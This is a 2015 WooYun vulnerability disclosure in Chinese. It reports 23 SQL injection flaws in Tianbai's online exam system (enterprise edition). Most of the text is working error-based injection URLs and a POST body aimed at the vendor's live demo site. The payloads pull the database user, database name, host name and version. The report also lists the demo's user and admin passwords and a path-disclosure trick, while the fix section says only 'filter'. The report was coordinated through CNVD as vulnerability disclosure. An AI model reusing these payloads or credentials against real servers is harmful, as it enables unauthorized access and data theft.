当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0131622

漏洞标题:天柏在线考试系统(企业版)SQL注入23处打包(demo测试)

相关厂商:天柏科技

漏洞作者: goubuli

提交时间:2015-08-07 15:43

修复时间:2015-11-05 13:48

公开时间:2015-11-05 13:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-07: 细节已通知厂商并且等待厂商处理中
2015-08-07: 厂商已经确认,细节仅向厂商公开
2015-08-10: 细节向第三方安全合作伙伴开放
2015-10-01: 细节向核心白帽子及相关领域专家公开
2015-10-11: 细节向普通白帽子公开
2015-10-21: 细节向实习白帽子公开
2015-11-05: 细节向公众公开

简要描述:

RT
所有剩余注入打包提交

详细说明:

应审核要求,所有剩余注入打包提交

厂商:上海天柏信息科技有限公司 
官网:http://timber2005.com/
案例:http://timber2005.com/Customer.html
企业版官方演示demo:http://exam1.timber2005.com
前台测试帐号:test1,test2,test3,test4,test5,test6 测试密码:123456
后台测试帐号:master 测试密码:123456


exam1.png


案例(正式客户数:7783):

client.png


demo演示【用户名/密码:test1/123456】
注入1、

http://exam1.timber2005.com/Paper/Paper_Manage.aspx?action=view&infoid=303 and 1=user--


11.png


注入2、

http://exam1.timber2005.com/Paper/Paper_Type_Random_Query.aspx?return=../Paper/Paper_Query.aspx&pid=305 and 1=user--


12.png


注入3、

http://exam1.timber2005.com/Exam/Exam_Type_Right.aspx?infoid=35 and 1=user--


13.png


注入4、

http://exam1.timber2005.com/Question/Question_Manage.aspx?action=view&infoid=121)) and 1=user--


稍微构造一下

http://exam1.timber2005.com/Question/Question_Manage.aspx?action=view&infoid=121'


14.png


注入5、

http://exam1.timber2005.com/Question/Question_Type_Manage.aspx?action=view&infoid=3 and 1=user--


15.png


注入6、

http://exam1.timber2005.com/Question/Knowledge_Right.aspx?infoid=118 and 1=user--


16.png


注入7、GET注入

http://exam1.timber2005.com/system/Position_Right.aspx?infoid=21 and 1=user--


17.png


POST型注入

http://exam1.timber2005.com/system/Position_Right.aspx


POST:

Position_Info1_treInfoList_ExpandState=nnnnn&Position_Info1_treInfoList_SelectedNode=&__EVENTTARGET=&__EVENTARGUMENT=&Position_Info1_treInfoList_PopulateLog=&__VIEWSTATE=%2FwEPDwUKLTkzNjcwODQ4MQ9kFgICAw9kFgQCEQ8PFgIeB1Zpc2libGVoZGQCFw9kFgICAQ88KwAJAgAPFgYeDU5ldmVyRXhwYW5kZWRkHgxTZWxlY3RlZE5vZGVkHglMYXN0SW5kZXgCBWQIFCsABgUTMDowLDA6MSwwOjIsMDozLDA6NBQrAAIWCB4EVGV4dAV26YOo6Zeo5Yqp55CGPGEgaHJlZj0nI3AnIHN0eWxlPSdtYXJnaW4tbGVmdDoxMHB4O2NvbG9yOnJlZDsnIG9uY2xpY2s9Im9rUFNCdXR0b25DbGljaygnMjEnLCfpg6jpl6jliqnnkIYnKSI%2B6YCJ5oupPC9hPh4FVmFsdWUFAjIxHghFeHBhbmRlZGceDFNlbGVjdEFjdGlvbgsqLlN5c3RlbS5XZWIuVUkuV2ViQ29udHJvbHMuVHJlZU5vZGVTZWxlY3RBY3Rpb24BZBQrAAIWCB8EBXzliqDmsrnnq5nnq5nplb88YSBocmVmPScjcCcgc3R5bGU9J21hcmdpbi1sZWZ0OjEwcHg7Y29sb3I6cmVkOycgb25jbGljaz0ib2tQU0J1dHRvbkNsaWNrKCcyNycsJ%2BWKoOayueermeermemVvycpIj7pgInmi6k8L2E%2BHwUFAjI3HwZnHwcLKwQBZBQrAAIWCB8EBXDliqDmsrnlkZg8YSBocmVmPScjcCcgc3R5bGU9J21hcmdpbi1sZWZ0OjEwcHg7Y29sb3I6cmVkOycgb25jbGljaz0ib2tQU0J1dHRvbkNsaWNrKCcyOScsJ%2BWKoOayueWRmCcpIj7pgInmi6k8L2E%2BHwUFAjI5HwZnHwcLKwQBZBQrAAIWCB8EBWrkuLvnrqE8YSBocmVmPScjcCcgc3R5bGU9J21hcmdpbi1sZWZ0OjEwcHg7Y29sb3I6cmVkOycgb25jbGljaz0ib2tQU0J1dHRvbkNsaWNrKCczNScsJ%2BS4u%2BeuoScpIj7pgInmi6k8L2E%2BHwUFAjM1HwZnHwcLKwQBZBQrAAIWCB8EBYIB5a6L5bCP5YGl55qE5bKX5L2NPGEgaHJlZj0nI3AnIHN0eWxlPSdtYXJnaW4tbGVmdDoxMHB4O2NvbG9yOnJlZDsnIG9uY2xpY2s9Im9rUFNCdXR0b25DbGljaygnMzYnLCflrovlsI%2FlgaXnmoTlspfkvY0nKSI%2B6YCJ5oupPC9hPh8FBQIzNh8GZx8HCysEAWRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBRpQb3NpdGlvbl9JbmZvMSR0cmVJbmZvTGlzdJcIgH6NkQGW%2B0oMhqZNOOfIgaCKdefVKhmgHykI%2FUqE&__VIEWSTATEGENERATOR=2622EB36&__EVENTVALIDATION=%2FwEdAAiTKBOi1XiDcXqUyV0SdyyXCfx%2BkHEsT%2Fq9JPrYUB%2BFFI7U3Vc0WZ%2BwxclqyPFfzmMGIljHegnqMccwcDBMgXY0WdwgR1KTjj%2Bb0f5EAac9YA3v4Ugp0DQCfDrVLkSvFLBnX1WvhHdrUgu82frszIAAF6nUgwMmppERt%2BrhodW6ghMy2CWvx%2Fwdyj0dvZFsVZ1LADeRpsvN6ySapYML0u7n&txtSearchText=12' and 1=user--&btnSearch=%E6%9F%A5%E8%AF%A2&P_PNAME=%24%E6%A0%B9%E8%8A%82%E7%82%B9&P_NAME=&P_SORT=&P_MARK=&P_PID=


17_1.png


注入8、

http://exam1.timber2005.com/system/Dep_Right.aspx?infoid=87 and 1=user--


18.png


注入9、

http://exam1.timber2005.com/exam/New_User_Exam_Single.aspx?wkey=SJ&planid=217&planname=231&time=10000&point=100&passpoint=60&module=%C3%A5%C2%8D%C2%95%C3%A5%C2%8D%C2%B7&pid=169&examkey='&ktypeid=&isanswer=%C3%A4%C2%B8%C2%8D%C3%A6%C2%98%C2%BE%C3%A7%C2%A4%C2%BA&return=User_Test_Query.aspx


19.png


注入10、

http://exam1.timber2005.com/exam/User_Test.aspx?wkey=GDSJ&planid=194&planname=df&time=10000&point=100&passpoint=60&module=%E6%95%B4%E5%8D%B7&pid=210&examkey='and 1=db_name()--&ktypeid=&isanswer=%E4%B8%8D%E6%98%BE%E7%A4%BA&return=User_Test_Query.aspx


20.png


注入11、

http://exam1.timber2005.com/exam/Labor_Exam_View.aspx?wkey=SJ&planid=256&planname=test&time=120&point=100&passpoint=60&module=%C3%A6%C2%95%C2%B4%C3%A5%C2%8D%C2%B7&pid=165&username=test1&usercnname=1&examkey=0424056D6B0A42A6A7' and 1=user--&userid=101&pager=1&resulturl=User_Exam_History_Query.aspx


21.png


注入12、

http://exam1.timber2005.com/exam/User_Exam_History_Card.aspx?examkey=29C04A631EDE4A21A8' and 1=@@version--


22.png


注入13、

http://exam1.timber2005.com/exam/User_Exam.aspx?wkey=GDSJ&planid=183 and 1=user--&planname=aaaaaaaaaaaaaaaaaaaaaaaa&time=100&point=20&passpoint=10&module=整卷&pid=198&examkey=4A7EF070347E4E8985&return=User_Exam_Reset_Query.aspx


23.png


上午分开提交的洞被打回,要求打包一起发,这样提交比较累。。。
今天挖的是企业版的洞,用户量应该比普通版的多。

厂商:上海天柏信息科技有限公司 
官网:http://timber2005.com/
案例:http://timber2005.com/Customer.html
企业版官方演示demo:http://exam1.timber2005.com
前台测试帐号:test1,test2,test3,test4,test5,test6 测试密码:123456
后台测试帐号:master 测试密码:123456


exam1.png


案例(正式客户数:7783):

client.png


DEMO演示【用户名/密码:master/123456】
注入一、

文件:User_Error_Exam.aspx
参数:pid


URL:

http://exam1.timber2005.com/exam/User_Error_Exam.aspx?wkey=GDSJ&planid=183&planname=&time=100&point=20&passpoint=10&module=%E6%95%B4%E5%8D%B7&pid=198 and 1=user&username=master&usercnname=master1&examkey=14B2DD51FF54486AB2&userid=61


1.png


注入二、

文件:Vote_Result_View.aspx
参数:infoid


URL:

http://exam1.timber2005.com/Info/Vote_Result_View.aspx?return=Vote_User.aspx&action=edit&infoid=9 and 1=user


2.png


注入三、

文件:Vote_User_Join.aspx
参数:infoid


URL:

http://exam1.timber2005.com/Info/Vote_User_Join.aspx?infoid=9 and 1=user


3.png


注入四、

文件:Vote_Manage.aspx
参数:infoid


URL:

http://exam1.timber2005.com/Info/Vote_Manage.aspx?action=view&infoid=9 and 1=user


4.png


注入五、

文件:Vote_Sub_Manage.aspx
参数:infoid


URL:

http://exam1.timber2005.com/Info/Vote_Sub_Manage.aspx?infoid=9 and 1=user


5.png


注入六、

文件:Test_Manage.aspx
参数:infoid


URL:

http://exam1.timber2005.com/Exam/Test_Manage.aspx?action=view&infoid=215 and 1=user


6.png


注入七、

文件:Exam_Persitence.aspx
参数:infoid


URL:

http://exam1.timber2005.com/Exam/Exam_Persitence.aspx?action=limit&infoid=217 and 1=user&type=2


7.png


注入八、

文件:Plan_Manage.aspx
参数:infoid


URL:

http://exam1.timber2005.com/Exam/Plan_Manage.aspx?action=view&infoid=260 and 1=user


8.png


注入九、

文件:Exam_Result_Role_Sub.aspx
参数:roleid


URL:

http://exam1.timber2005.com/Exam/Exam_Result_Role_Sub.aspx?roleid=1 and 1=user--


9.png


http://exam1.timber2005.com/Exam/Exam_Result_Role_Sub.aspx?roleid=1'


9_1.png


注入十、

文件:Exam_Persitence.aspx
参数:infoid=265


URL:

http://exam1.timber2005.com/Exam/Exam_Persitence.aspx?action=limit&infoid=265 and 1=user--&type=1


10.png


================================
附送泄露路径:
访问:

http://exam1.timber2005.com/exam/User_Error_Exam.aspx?wkey=GDSJ&planid=183&planname=aaaaaaaaaaaaaaaaaaaaaaaa&time=100&point=20&passpoint=10&module=%E6%95%B4%E5%8D%B7&pid=198&username=master&usercnname=master1&examkey=14B2DD51FF54486AB2'&userid=61


在examkey参数后加入'导致

1_1.png


路径:

D:\公司演示网站\V2014.09.01\考试系统企业版\compiled_web\UpLoad\ExamPaper\183\14B2DD51FF54486AB2'.exam


手好累

漏洞证明:

上面已经证明
上面已经证明,现在选取其中一个URL演示获取其他内容
1、获取数据库名

http://exam1.timber2005.com/Info/Vote_Sub_Manage.aspx?infoid=9 and 1=db_name()--


10_1.png


2、获取机器名称

http://exam1.timber2005.com/Info/Vote_Sub_Manage.aspx?infoid=9 and 1=host_name()--


10_2.png


其他不在一一演示

修复方案:

过滤

版权声明:转载请注明来源 goubuli@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-08-07 13:47

厂商回复:

CNVD确认所述情况,已由CNVD通过软件生产厂商(或网站管理方)公开联系渠道向其邮件(和电话)通报,由其后续提供解决方案并协调相关用户单位处置。

最新状态:

暂无